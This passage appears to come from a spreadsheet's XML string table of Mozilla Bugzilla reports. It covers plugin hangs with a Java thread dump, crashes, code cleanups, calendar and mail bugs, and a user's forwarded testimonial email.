    <t>PLUGINS_GRAVEYARD-508315</t>
  </si>
  <si>
    <t>Applet on Mac Firefox hangs while loading ImageIcon or applet class</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1
This may be a bug in the Java Embedded Plugin but noting it here as well: https://sourceforge.net/support/tracker.php?aid=2832144
Unable to log bug with Apple since their site is down.
Platform: Mac OS X 10.4 (Power PC) 10.5 (Intel Core 2 Duo)
Firefox: 3.5
Reproducible: Always
Steps to Reproduce:
1. Try to show a panel in the applet with a label which contains ImageIcon. Load the ImageIcon from the network.
2. Or try loading a ResourceBundle. The ResourceBundle should be bundled with the applet.
Since this is an issue with threads you will notice errors occassionally.
Actual Results:  
Applet does not show up and firefox hangs
Expected Results:  
Applet should load properly without causing firefox to hang.
Thread dump while loading ImageIcon:
23015 /Volumes/Firefox 1/Firefox.app/Contents/MacOS/firefox-bin
-psn_0_55443457
COMMAND
/Volumes/Firefox 1/Firefox.app/Contents/MacOS/firefox-bin -psn_0_55443457
Full thread dump Java HotSpot(TM) Client VM (1.5.0_19-138 mixed mode):
StackTrace Remote Thread prio=5 tid=0x0713c0d0 nid=0x25d3400 runnable
[0x00000000..0xf0c98290]
Image Fetcher 0 daemon prio=4 tid=0x07140e30 nid=0x25e1a00 runnable
[0xf0f9d000..0xf0f9eb30]
at com.sun.deploy.net.cookie.JEPCookieHandler.getCookie(Native Method)
at com.sun.deploy.net.cookie.JEPCookieHandler.getCookieInfo(Unknown
Source)
at
com.sun.deploy.net.cookie.DeployCookieManager.getCookieInfo(DeployCookieMan
ager.java:83)
- locked  (a java.lang.Class)
at
com.sun.deploy.net.cookie.DeployCookieSelector.get(DeployCookieSelector.jav
a:70)
- locked  (a com.sun.deploy.net.cookie.DeployCookieSelector)
at
sun.net.www.protocol.http.HttpURLConnection.addRequestCookies(HttpURLConnec
tion.java:475)
at
sun.net.www.protocol.http.HttpURLConnection.writeRequests(HttpURLConnection
.java:428)
at
sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnectio
n.java:972)
- locked  (a sun.net.www.protocol.http.HttpURLConnection)
at
sun.plugin.net.protocol.http.HttpUtils.followRedirects(HttpUtils.java:43)
at sun.plugin.cache.CachedFileLoader.download(CachedFileLoader.java:296)
at sun.plugin.cache.CachedFileLoader.load(CachedFileLoader.java:119)
at sun.plugin.cache.FileCache.get(FileCache.java:136)
at sun.plugin.cache.PluginCacheHandler.get(PluginCacheHandler.java:87)
- locked  (a sun.plugin.cache.PluginCacheHandler)
at
sun.net.www.protocol.http.HttpURLConnection.plainConnect(HttpURLConnection.
java:734)
at
sun.net.www.protocol.http.HttpURLConnection.connect(HttpURLConnection.java:
707)
at
sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnectio
n.java:951)
- locked  (a sun.net.www.protocol.http.HttpURLConnection)
at sun.awt.image.URLImageSource.getDecoder(URLImageSource.java:107)
at
sun.awt.image.InputStreamImageSource.doFetch(InputStreamImageSource.java:24
0)
at sun.awt.image.ImageFetcher.fetchloop(ImageFetcher.java:172)
at sun.awt.image.ImageFetcher.run(ImageFetcher.java:136)
StackTrace Shell 10000 prio=5 tid=0x0713bc40 nid=0x69f3e00 runnable
[0xf0e9c000..0xf0e9cb30]
at java.net.PlainSocketImpl.socketAccept(Native Method)
at java.net.PlainSocketImpl.accept(PlainSocketImpl.java:384)
- locked  (a java.net.SocksSocketImpl)
at java.net.ServerSocket.implAccept(ServerSocket.java:450)
at java.net.ServerSocket.accept(ServerSocket.java:421)
at com.adaptj.shell.ServerThread.run(Unknown Source)
AWT-EventQueue-6 prio=4 tid=0x0712c6f0 nid=0x23ee400 in Object.wait()
[0xf0d99000..0xf0d9ab30]
at java.lang.Object.wait(Native Method)
- waiting on  (a java.awt.MediaTracker)
at java.awt.MediaTracker.waitForID(MediaTracker.java:651)
- locked  (a java.awt.MediaTracker)
at javax.swing.ImageIcon.loadImage(ImageIcon.java:234)
- locked  (a java.awt.MediaTracker)
at javax.swing.ImageIcon.(ImageIcon.java:165)
at com.xxxx.client.upload.applet.FileName.(FileName.java:36)
.....company classes..................
at
com.xxxxx.client.upload.applet.DragDropEventListener.drop(DragDropEventList
ener.java:57)
at java.awt.dnd.DropTarget.drop(DropTarget.java:430)
- locked  (a java.awt.dnd.DropTarget)
at
sun.awt.dnd.SunDropTargetContextPeer.processDropMessage(SunDropTargetContex
tPeer.java:500)
at
sun.awt.dnd.SunDropTargetContextPeer.access$800(SunDropTargetContextPeer.ja
va:53)
at
sun.awt.dnd.SunDropTargetContextPeer$EventDispatcher.dispatchDropEvent(SunD
ropTargetContextPeer.java:812)
- locked  (a apple.awt.CDropTargetContextPeer)
at
sun.awt.dnd.SunDropTargetContextPeer$EventDispatcher.dispatchEvent(SunDropT
argetContextPeer.java:736)
at sun.awt.dnd.SunDropTargetEvent.dispatch(SunDropTargetEvent.java:29)
at java.awt.Component.dispatchEventImpl(Component.java:3908)
at java.awt.Container.dispatchEventImpl(Container.java:2068)
at java.awt.Component.dispatchEvent(Component.java:3885)
at java.awt.LightweightDispatcher.retargetMouseEvent(Container.java:4256)
at
java.awt.LightweightDispatcher.processDropTargetEvent(Container.java:4007)
at java.awt.LightweightDispatcher.dispatchEvent(Container.java:3861)
at java.awt.Container.dispatchEventImpl(Container.java:2054)
at java.awt.Component.dispatchEvent(Component.java:3885)
at java.awt.EventQueue.dispatchEvent(EventQueue.java:463)
at jep.MySimpleEventQueue.dispatchEvent(Unknown Source)
at
java.awt.EventDispatchThread.pumpOneEventForHierarchy(EventDispatchThread.j
ava:269)
at
java.awt.EventDispatchThread.pumpEventsForHierarchy(EventDispatchThread.jav
a:190)
at java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:184)
at java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:176)
at java.awt.EventDispatchThread.run(EventDispatchThread.java:110)
TimerQueue daemon prio=4 tid=0x0712bb40 nid=0x2327a00 in Object.wait()
[0xf0e1b000..0xf0e1bb30]
at java.lang.Object.wait(Native Method)
- waiting on  (a javax.swing.TimerQueue)
at javax.swing.TimerQueue.run(TimerQueue.java:236)
- locked  (a javax.swing.TimerQueue)
at java.lang.Thread.run(Thread.java:613)
AWT-EventQueue-1 prio=6 tid=0x07118d40 nid=0x22d7e00 in Object.wait()
[0xf10a0000..0xf10a0b30]
at java.lang.Object.wait(Native Method)
- waiting on  (a jep.MySimpleEventQueue)
at java.lang.Object.wait(Object.java:474)
at java.awt.EventQueue.getNextEvent(EventQueue.java:345)
- locked  (a jep.MySimpleEventQueue)
at
java.awt.EventDispatchThread.pumpOneEventForHierarchy(EventDispatchThread.j
ava:216)
at
java.awt.EventDispatchThread.pumpEventsForHierarchy(EventDispatchThread.jav
a:190)
at java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:184)
at java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:176)
at java.awt.EventDispatchThread.run(EventDispatchThread.java:110)
TimerQueue daemon prio=5 tid=0x07116ab0 nid=0x27d2400 in Object.wait()
[0xf0f1d000..0xf0f1db30]
at java.lang.Object.wait(Native Method)
- waiting on  (a javax.swing.TimerQueue)
at javax.swing.TimerQueue.run(TimerQueue.java:236)
- locked  (a javax.swing.TimerQueue)
at java.lang.Thread.run(Thread.java:613)
thread applet-com.xythos.client.upload.applet.UploadApplet.class prio=4
tid=0x07115500 nid=0x2344200 in Object.wait() [0xf0992000..0xf0992b30]
at java.lang.Object.wait(Native Method)
- waiting on  (a jep.AppletFramePanel)
at java.lang.Object.wait(Object.java:474)
at sun.applet.AppletPanel.getNextEvent(AppletPanel.java:284)
- locked  (a jep.AppletFramePanel)
at sun.applet.AppletPanel.run(AppletPanel.java:334)
at jep.AppletFramePanel.run(Unknown Source)
at java.lang.Thread.run(Thread.java:613)
ConsoleWriterThread daemon prio=6 tid=0x07112450 nid=0x2631200 in
Object.wait() [0xf0d19000..0xf0d19b30]
at java.lang.Object.wait(Native Method)
- waiting on  (a java.lang.Object)
at java.lang.Object.wait(Object.java:474)
at
com.sun.deploy.util.ConsoleTraceListener$ConsoleWriterThread.run(ConsoleTra
ceListener.java:72)
- locked  (a java.lang.Object)
AWT-EventQueue-4 prio=6 tid=0x07110b90 nid=0x2112400 in Object.wait()
[0xf0b15000..0xf0b15b30]
at java.lang.Object.wait(Native Method)
at java.lang.Object.wait(Object.java:474)
at java.awt.EventQueue.getNextEvent(EventQueue.java:345)
- locked  (a java.awt.EventQueue)
at
java.awt.EventDispatchThread.pumpOneEventForHierarchy(EventDispatchThread.j
ava:216)
at
java.awt.EventDispatchThread.pumpEventsForHierarchy(EventDispatchThread.jav
a:190)
at java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:184)
at java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:176)
at java.awt.EventDispatchThread.run(EventDispatchThread.java:110)
traceMsgQueueThread daemon prio=5 tid=0x071101f0 nid=0x253c600 in
Object.wait() [0xf0c17000..0xf0c17b30]
at java.lang.Object.wait(Native Method)
- waiting on  (a java.util.ArrayList)
at java.lang.Object.wait(Object.java:474)
at com.sun.deploy.util.Trace$TraceMsgQueueChecker.run(Trace.java:74)
- locked  (a java.util.ArrayList)
at java.lang.Thread.run(Thread.java:613)
AWT-EventQueue-3 prio=6 tid=0x0710f910 nid=0x215b200 in Object.wait()
[0xf0b96000..0xf0b96b30]
at java.lang.Object.wait(Native Method)
- waiting on  (a jep.MySimpleEventQueue)
at java.lang.Object.wait(Object.java:474)
at java.awt.EventQueue.getNextEvent(EventQueue.java:345)
- locked  (a jep.MySimpleEventQueue)
at
java.awt.EventDispatchThread.pumpOneEventForHierarchy(EventDispatchThread.j
ava:216)
at
java.awt.EventDispatchThread.pumpEventsForHierarchy(EventDispatchThread.jav
a:190)
at java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:184)
at java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:176)
at java.awt.EventDispatchThread.run(EventDispatchThread.java:110)
Java2D Disposer daemon prio=10 tid=0x0710f150 nid=0x2651000 in
Object.wait() [0xf0a94000..0xf0a94b30]
at java.lang.Object.wait(Native Method)
- waiting on  (a java.lang.ref.ReferenceQueue$Lock)
at java.lang.ref.ReferenceQueue.remove(ReferenceQueue.java:120)
- locked  (a java.lang.ref.ReferenceQueue$Lock)
at java.lang.ref.ReferenceQueue.remove(ReferenceQueue.java:136)
at sun.java2d.Disposer.run(Disposer.java:125)
at java.lang.Thread.run(Thread.java:613)
AWT-Shutdown prio=5 tid=0x0710ddc0 nid=0x2608200 in Object.wait()
[0xf0a13000..0xf0a13b30]
at java.lang.Object.wait(Native Method)
- waiting on  (a java.lang.Object)
at java.lang.Object.wait(Object.java:474)
at sun.awt.AWTAutoShutdown.run(AWTAutoShutdown.java:259)
- locked  (a java.lang.Object)
at java.lang.Thread.run(Thread.java:613)
Low Memory Detector daemon prio=5 tid=0x0710ab00 nid=0x22a8e00 runnable
[0x00000000..0x00000000]
CompilerThread0 daemon prio=9 tid=0x0710a140 nid=0x2798600 waiting on
condition [0x00000000..0xf080f450]
Signal Dispatcher daemon prio=9 tid=0x07109c90 nid=0x26bce00 runnable
[0x00000000..0x00000000]
Finalizer daemon prio=8 tid=0x07109360 nid=0x2348000 in Object.wait()
[0xf070d000..0xf070db30]
at java.lang.Object.wait(Native Method)
- waiting on  (a java.lang.ref.ReferenceQueue$Lock)
at java.lang.ref.ReferenceQueue.remove(ReferenceQueue.java:120)
- locked  (a java.lang.ref.ReferenceQueue$Lock)
at java.lang.ref.ReferenceQueue.remove(ReferenceQueue.java:136)
at java.lang.ref.Finalizer$FinalizerThread.run(Finalizer.java:159)
Reference Handler daemon prio=10 tid=0x07108fc0 nid=0x2228c00 in
Object.wait() [0xf068c000..0xf068cb30]
at java.lang.Object.wait(Native Method)
- waiting on  (a java.lang.ref.Reference$Lock)
at java.lang.Object.wait(Object.java:474)
at java.lang.ref.Reference$ReferenceHandler.run(Reference.java:116)
- locked  (a java.lang.ref.Reference$Lock)
AWT-AppKit prio=8 tid=0x07101600 nid=0xa000ed88 runnable
[0xbfffd000..0xbfffe5b0]
at apple.awt.CToolkit.doAWTRunLoop(Native Method)
at apple.awt.CToolkit.invokeAndWait(CToolkit.java:1053)
at apple.awt.CToolkit.invokeAndWait(CToolkit.java:1034)
at
apple.awt.CDropTargetContextPeer.flushEvents(CDropTargetContextPeer.java:50
)
VM Thread prio=9 tid=0x07108780 nid=0x2602200 runnable
VM Periodic Task Thread prio=9 tid=0x0710c220 nid=0x25ff200 waiting on
condition
Exception Catcher Thread prio=10 tid=0x07101810 nid=0x205d200 runnable</t>
  </si>
  <si>
    <t>hranavat</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-143173</t>
  </si>
  <si>
    <t>links to Bugzilla contain specific reporter's name and unnecessary fields</t>
  </si>
  <si>
    <t>Links from the review changes page to Bugzilla (for requesting CVS access and
reporting a documentation bug) contain reporter=myk@mozilla.org and some fields
that do not need to be initialized.  They should be removed.</t>
  </si>
  <si>
    <t>CORE-451985</t>
  </si>
  <si>
    <t>Crash at every shutdown with completely blank stack trace</t>
  </si>
  <si>
    <t>Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9.1a2pre) Gecko/20080824021213 Minefield/3.1a2pre ID:20080824021213
Every time I quit firefox I get the crash reporter coming up. This happens in a completely new profile and with a completely new installation.
The stack trace is completely blank. There is a correct time build id any comments I entered and a few other things but no stack trace at all.
Example trace: http://crash-stats.mozilla.com/report/index/cb9e24de-7217-11dd-8257-001cc45a2ce4?p=1
Other crashes do give a stack trace so it's not a problem with submission.
This is a regression from between 2008-07-13-02 and 2008-07-14-02.</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-366341</t>
  </si>
  <si>
    <t>remove xmlterm from the tree</t>
  </si>
  <si>
    <t>this code hasn't been touched in a long time and is no longer maintained.</t>
  </si>
  <si>
    <t>CORE-93305</t>
  </si>
  <si>
    <t>CanvasFrame contains pointless nsPrefs usage.</t>
  </si>
  <si>
    <t>While working on something completely different I came across the following 
piece of code in CanvasFrame::Init()...
  prefs-&gt;GetBoolPref(layout.reflow.showframecounts 
It struck me as odd that we were setting a focus preference based on a frame 
count preference so I dug a little deeper. The variable is initialized read from 
the pref and never used anywhere. It appears that this is probably the result of 
cut and paste from nsPresShell where it is actually used for frame counting 
(based on a preference from pref-debug1.xul).
Removal of this will in some minor way help with both performance and 
footprint.
cc'ing some layout people (and dbaron because he recently cleaned this code up 
:)) for input/reviews.
Patch on the way.</t>
  </si>
  <si>
    <t>bnesse</t>
  </si>
  <si>
    <t>CORE-384046</t>
  </si>
  <si>
    <t>nsSVGOuterSVGFrame::Reflow should not call NotifyViewportChange unconditionally</t>
  </si>
  <si>
    <t>Created attachment 267993
patch
In nsSVGOuterSVGFrame::Reflow we should not call NotifyViewportChange unconditionally. We only need to call NotifyViewportChange if the canvas transform matrix has changed and that's only the case if we have a viewBox attribute and the computed width/height of the  element has changed.
We should also really tidy up this Reflow method. It casts/QIs mContent to nsSVGSVGElement no less than three times and it's much harder to follow than it needs to be.</t>
  </si>
  <si>
    <t>THUNDERBIRD-515179</t>
  </si>
  <si>
    <t>Make about:rights etc open in an existing window if one is already open</t>
  </si>
  <si>
    <t>Created attachment 399218
The fix
Bryan and I discussed this a while back and I've just realised I've not put the patch anywhere.
This makes it so that if there is an existing main mail window open it'll open a tab in that window and bring it to the front. If there isn't it will open a new window (the dialog is no longer modal so that's fine now).</t>
  </si>
  <si>
    <t>BUGZILLA-504418</t>
  </si>
  <si>
    <t>mod_perl CGI requirement no longer newer than base CGI requirement? Confusing generated versions in docs</t>
  </si>
  <si>
    <t>from email:
&gt; 2.1.7. Installing Bugzilla on mod_perl
&gt; ...
&gt; Bugzilla also requires a more up-to-date version of the CGI perl module
&gt; to be installed version 3.21 as opposed to 3.21
3.2 3.4 and tip all have this.  3.0 says version 3.11 as opposed to 2.93.  I'm assuming the version numbers are generated from the defines at the beginning of the docs and that our mod_perl CGI requirement is no longer different than the base CGI requirement which makes this sentence confusing.</t>
  </si>
  <si>
    <t>CORE-165622</t>
  </si>
  <si>
    <t>Build warning caused by bug 139905 checkin</t>
  </si>
  <si>
    <t>2. content/base/src/nsPrintEngine.cpp:274 (See build log excerpt)
   Will be re-ordered to match declaration order
   272   mIsDoingPrinting(PR_FALSE)
   273 
   274 {
   275   NS_INIT_ISUPPORTS()
   276 }</t>
  </si>
  <si>
    <t>CORE-397651</t>
  </si>
  <si>
    <t>[FIX]PSM duplicates subject/object principal code</t>
  </si>
  <si>
    <t>It looks like nsCrypto.cpp has (somewhat bitrotted) clones of the GetObjectPrincipal and GetSubjectPrincipal code that lives in the security manager.  I think we should remove this code and just use the security manager directly here.
All that this code is really trying to do is to find the current principal active on the given JSContext.  The JSContext in question comes from the current native XPConnect call context.
In other words I think this should just be a GetSubjectPrincipal call into the security manager.
Requesting blocking on the assumption that bitrotted security code is bad.
Oh and I'm not sure why this is doing all that stuff with manually calling JS_EvaluateScriptForPrincipals instead of using nsIScriptContext.  The current code looks like the event could run after the JSContext has been destroyed.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-296971</t>
  </si>
  <si>
    <t>comedycentral.com - can't view Motherload videos</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.7) Gecko/20050414
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.7) Gecko/20050414
The Comedy Central website changed formats recently and now requires Mediaplayer
version 9. I downloaded the new mediaplayer and followed the instructions on
their website if one can't play the videos but Mozilla still doesn't play the
videos. It just sits there doesn't load and doesn't buffer. If I use Internet
Explorer it works fine. I wrote Comedy Central about the problem but I
received no response. Now I have to use IE to watch comedy central videos via
the internet.
Reproducible: Always
Steps to Reproduce:
1. Go teo the home page
2. Click on the comedian/correspondents section
3. Click on any of the archived videos
Actual Results:  
The video didn't load. Mediaplayer just sat there and did nothing. 
Expected Results:  
In IE mediaplayer contacts loads and buffers the video.</t>
  </si>
  <si>
    <t>karringmoan</t>
  </si>
  <si>
    <t>TOOLKIT-371485</t>
  </si>
  <si>
    <t>Selected item text should be white instead of black (given dark blue background color)</t>
  </si>
  <si>
    <t>The background color for selected list items was recently changed to dark blue in bug 371053.  The text color in Firefox's download manager should be changed to be readable / look good against the new background.</t>
  </si>
  <si>
    <t>BUGZILLA-323106</t>
  </si>
  <si>
    <t>create-series JavaScript Error: 'options' is null or not an object.</t>
  </si>
  <si>
    <t>User-Agent: Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.1 SV1 .NET CLR 1.0.3705 .NET CLR 1.1.4322 .NET CLR 2.0.50727)
Error
(x) A Runtime Error has occurred.
    Do you wish to Debug?
    Line: 363
    Error: 'options' is null or not an object.
  [   Yes    ]  [    No    ]
this doesn't make sense
  &lt;body onload=selectProduct(document.forms['chartform'])
/* selectProduct reads the selection from the product control and
 * updates version component and milestone controls accordingly.
function selectProduct(product component version milestone) {
        sel = get_selection(product findall false)
/* Returns an array of indexes or values from a select form control.
 *    - control: select control from which to find selections
function get_selection(control findall want_values) {
        if (findall || control.options[i].selected) {</t>
  </si>
  <si>
    <t>wicked</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-476422</t>
  </si>
  <si>
    <t>JavaScript exception when clicking File menu of Write: window while composing message</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9) Gecko/2008052906 Firefox/3.0
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1b3pre) Gecko/20090201 Lightning/1.0pre
When in message Write mode (i.e. composing a message or viewing a draft) if
the File menu of the Write: (compose) window is clicked the following
JavaScript exception is generated:
Error: [Exception... 'JavaScript component does not have a method named:
handleEvent' when calling method: [nsIDOMEventListener::handleEvent] 
nsresult: 0x80570030 (NS_ERROR_XPC_JSOBJECT_HAS_NO_FUNCTION_NAMED)  location:
  data: no]
This is a regression starting with: Mozilla/5.0 (Windows U Windows NT 5.1
en-US rv:1.9.1b3pre) Gecko/20081230 Shredder/3.0b2pre
Reproducible: Always
Steps to Reproduce:
1. Click to compose a new message (or open a draft message)
2. Click the File menu of that Write: (compose) window
3. Observe the exception in Error Console</t>
  </si>
  <si>
    <t>CORE-96305</t>
  </si>
  <si>
    <t>[BiDi] Right-to-left Hebrew does not work on Mac</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Macintosh U PPC en-US rv:0.9.3+) Gecko/20010821
BuildID:    2001082108
When viewing *any* logical Hebrew page text renders left-to-right so in
effect only visual Hebrew is supported. Picking ISO-8859-8-I Windows-1255 or
Visual Hebrew makes no difference. I tried changing my default script from
Hebrew to Roman. I tried restarting without WorldScript I at all. Neither helps.
Reproducible: Always
Steps to Reproduce:
1.View any logical Hebrew page on the web
Actual Results:  It was rendered left-to-right
Expected Results:  Render it bidirectionally.</t>
  </si>
  <si>
    <t>mozila.bugzilla</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-406874</t>
  </si>
  <si>
    <t>create mini talos boxes that run without chrome (all platforms)</t>
  </si>
  <si>
    <t>Created attachment 291538
create mini winxp branch/trunk boxes for nochrome tests
As part of the production set we were interested in having machines that run the tests without chrome - this patch would set up a mini winxp branch and a mini winxp trunk both running tests without chrome.</t>
  </si>
  <si>
    <t>CALENDAR-329373</t>
  </si>
  <si>
    <t>Lightning fails to create new local ICS file (sunbird succeeds)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
Build Identifier: Lightning 20060303 Thunderbird 1.5 20051201
Lightning does not create a new ics file.  It does not alert the user that creation has failed and the calendar name appears in the list of calendars but no file appears in the file system and events created in the new ics calendar don't appear.
Sunbird succeeds for this same operation.
Lightning does succeed in opening and adding to an existing ics file.
Reproducible: Always
Steps to Reproduce:
1. Lightning: calendars tab new calendar
2. select (*) remote click next
3. enter nonexisting file url such as file:///c:/temp/icsTest345.ics click next
4. click next (keep name)
4a. Your calendar has been created appears in dialog
4b. icsTest45 appears in in calendar list
4c. Error appears in javascript console (see below)
5. click finish (dismiss dialog)
6. click checkmark next to calendar icsTest345 so calendar is selected and visible.
7. create event say by dragging region in day view.
  event disappears does not appear in day view.
  (if created in 'home' calendar does appear)
8. create todo.
  todo does not appear in todo list.
  (if created in 'home' calendar does appear)
Actual Results:  
After step 4:
  Error: loader.request has no properties
  Source File: file:///...components/calICSCalendar.js
  Line: 184
Expected Results:  
After step 4:  expect no error.
  (When there is an error it should report error to user and probably should      
   not show calendar in calendar list (since can't add anything to it).)
Error occurs in calICSCalendar.onStreamComplete
http://lxr.mozilla.org/mozilla/source/calendar/providers/ics/calICSCalendar.js#178
loader.request is null (evaluated loader.request after stopped in venkman the venkman stack browser doesn't show any properties maybe because it is not a javascript object)
The nsIStreamLoader.request property may be null after the request has finished loading
http://www.xulplanet.com/references/xpcomref/ifaces/nsIStreamLoader.html
This explains why the error is thrown but not why it doesn't appear in sunbird.</t>
  </si>
  <si>
    <t>CORE-488042</t>
  </si>
  <si>
    <t>disable XPCOM plugin loading</t>
  </si>
  <si>
    <t>We need to remove XPCOM plugin support piece-by-piece and first we need to disable XPCOM plugin loading so we can start removing parts.</t>
  </si>
  <si>
    <t>CORE-380911</t>
  </si>
  <si>
    <t>Remove nsRecycled.h</t>
  </si>
  <si>
    <t>Created attachment 265028
proposed patch
Using nsRecycled for DOMEvents seems like an over optimization which doesn't even work because most of the time we do have more than one
DOM event alive.
The patch also removes some extra #includes</t>
  </si>
  <si>
    <t>FIREFOX_FOR_METRO_GRAVEYARD-785764</t>
  </si>
  <si>
    <t>Work -  popup for forms is always in the top left corner of the screen</t>
  </si>
  <si>
    <t>The container inherits a style that changed with the menu rework in bug 785280. The popup also needs metro styling.</t>
  </si>
  <si>
    <t>MARKETING-247203</t>
  </si>
  <si>
    <t>Testimonial: more Firefox feedback</t>
  </si>
  <si>
    <t>-------- Original Message --------
Subject: 	Re: Feedback on Firefox 9.0 one item for wish list
Date: 	Wed 16 Jun 2004 15:29:19 -0500
From: 	Suzanne.Sims@its.state.ms.us
To: 	chofmann@mozilla.org
CC: 	Suzanne.Sims@its.state.ms.us
Chris
EXCELLENT!  I now have this working.  Is there ANYTHING you guys can't do?
-)  I'll check out those extensions!  Thanks for mentioning them.  I just
took a look at 9 today so I am sure there is a lot more I will be
impressed with.
I dont mind my comments being used as I sent them but I would like to know
which ones will be used.  I am guessing just the first paragraph of my
original email?  And thanks for asking before using them!!  -)
Thanks
Suzanne
---Original Message---
Dear Suzanne:
&gt; I am contacting you on behalf of the Mozilla Foundation regarding your
&gt; Feedback on Firefox 9.0 one item for wish list email.
&gt;
&gt; With regard to your wish list request there are several Firefox
&gt; configurations which allow for similar functionality. To create a
&gt; startup profile which loads multiple tabs:
&gt; 1.  Open each page you wish to include in a new tab.  (New tabs can be
&gt; opened using Ctrl + T or by selecting File | New Tab.)
&gt; 2.  Select Tools | Options then category General.  Under Home
&gt; Page select the Use Current Pages option.  This will load all
&gt; currently open tabs on browser startup.
&gt; Also you may be interested in a Firefox extension called Tabbrowser
&gt; Extensions which is currently available from
&gt; http://texturizer.net/firefox/extensions/.  This extension enhances
&gt; the functionality of tabbed browsing by enabling advanced
&gt; customization of tabs as well as the bookmarking of tab groups.
&gt; While this extension is still in development the version available
&gt; through the site above is stable and compatible with the most current
&gt; Firefox release.
&gt;
&gt; Finally the Mozilla Foundation is preparing for the release of
&gt; Firefox1.0 and requests your authorization to use portions of the
&gt; email in press releases or other promotional material that will
&gt; accompany the release.  Please reply to the email address below with
&gt; any questions additional comments or to help us out and authorize
&gt; the use of your statement.
&gt;
&gt; The Mozilla Foundation thanks you for your enthusiastic support of the
&gt; browser.
Chris Hofmann Engineering Director
chofmann@mozilla.org
&gt;
&gt;
&gt; -------- Original Message --------
&gt; Subject:     Feedback on Firefox 9.0 one item for wish list
&gt; Date:     Wed 16 Jun 2004 09:17:53 -0500
&gt; From:     Suzanne.Sims@its.state.ms.us
&gt; 
&gt; To:     webmaster@mozilla.org 
&gt;
&gt;
&gt;
&gt; Hi there!  This version of Firefox is TOO MUCH!!!!!!!!!!!!!!!!  The
&gt; Developer's tool bar is just so far beyond where most are with their
&gt; browsers!  I am still stunned at what all you've been able to add for
&gt; developers the validation seeing the table layout all in all
&gt; WONDERFUL!!!!!
&gt;
&gt; There is only one thing that is stopping me from using Firefox 9.0 as
&gt; my only browser.  Opera has a really cool feature that has me using
&gt; their browser every day.  I have over 12 agencies that I handle
&gt; websites for. Opera allows me to set up multiple tabs and save this as
&gt; a profile so that when I start Opera each day all of my websites are
&gt; automatically displayed in their own tab all at once.  This makes
&gt; checking the uptime of sites a cinch.
&gt;
&gt; Is there anyway this could be added to the next release of Firefox?
&gt;
&gt; Thanks!
&gt;
&gt; Suzanne
&gt;
&gt;
&gt;
&gt; Confidentiality Note: The information contained in this email and/or
&gt; document(s) attached is for the exclusive use of the individual named
&gt; above and may contain confidential privileged and non-disclosable
&gt; information. If you are not the intended recipient you are hereby
&gt; notified that you are strictly prohibited from reading photocopying
&gt; distributing or otherwise using this e-mail or its contents in any
&gt; way. If you have received this transmission in error please notify me
&gt; immediately.
&gt;</t>
  </si>
  <si>
    <t>MOZILLA.ORG-71137</t>
  </si>
  <si>
    <t>need CVS commit account for katakai@japan.sun.com</t>
  </si>
  <si>
    <t>I have been working on bugfixes around I18N but just provided patches.
But I'd like to start hacking Mozilla.
I already submitted many bugs around widget/src/gtk I18N and applied
the patches e.g. bug 53990 and bug 68317 I have already got r= and
sr= for these bugs.
I also have completed CVS contributor form and got an account for
Mozilla.org from knous@netscape.com.
Thanks.</t>
  </si>
  <si>
    <t>TOOLKIT-509048</t>
  </si>
  <si>
    <t>hitting enter after a paste into the location bar does nothing</t>
  </si>
  <si>
    <t>i can't reproduce this on-demand but have hit it enough times that i'm sure it's not user-errror.
STR:
1. open a new tab
2. paste a URL into the location bar
3. hit enter
Expected: page opens
Actual: nothing happens</t>
  </si>
  <si>
    <t>CORE-306164</t>
  </si>
  <si>
    <t>global scope polluter is missing after document.write()</t>
  </si>
  <si>
    <t>Regression from bug 296639.
javascript:document.write(alert(x))document.close()
Mozilla/5.0 (Windows U Win98 en-US rv:1.8b4) Gecko/20050730 Firefox/1.0+
=&gt; alerts [object HTMLScriptElement]
Mozilla/5.0 (Windows U Win98 en-US rv:1.8b4) Gecko/20050826 Firefox/1.0+
=&gt; Error: x is not defined in JS console</t>
  </si>
  <si>
    <t>WEBSITES-511595</t>
  </si>
  <si>
    <t>broken link to weave terms of use</t>
  </si>
  <si>
    <t>https://services.mozilla.com/firstrun/ links to http://labs.mozilla.com/projects/weave/tos/ which gives me a 404 error (after rewriting itself to http://labs.mozilla.com/weavetos/).
Poking around under http://labs.mozilla.com/weave/ did *not* reveal the TOS page -- did it maybe get deleted by accident during the Labs site revamp?</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-276611</t>
  </si>
  <si>
    <t>themarker.com - Contents of responses to articles are not displayed at www.themarker.com</t>
  </si>
  <si>
    <t>Go to the Hebrew site of www.themarker.com.
Click on one of the news headlines or articles that have responses of readers
(the  responses are below the article when you enter the article page).
Click on one of the responses. The subject and sender of the response are shown
but the contents is always shown as empty by firefox/Mozilla although it is not
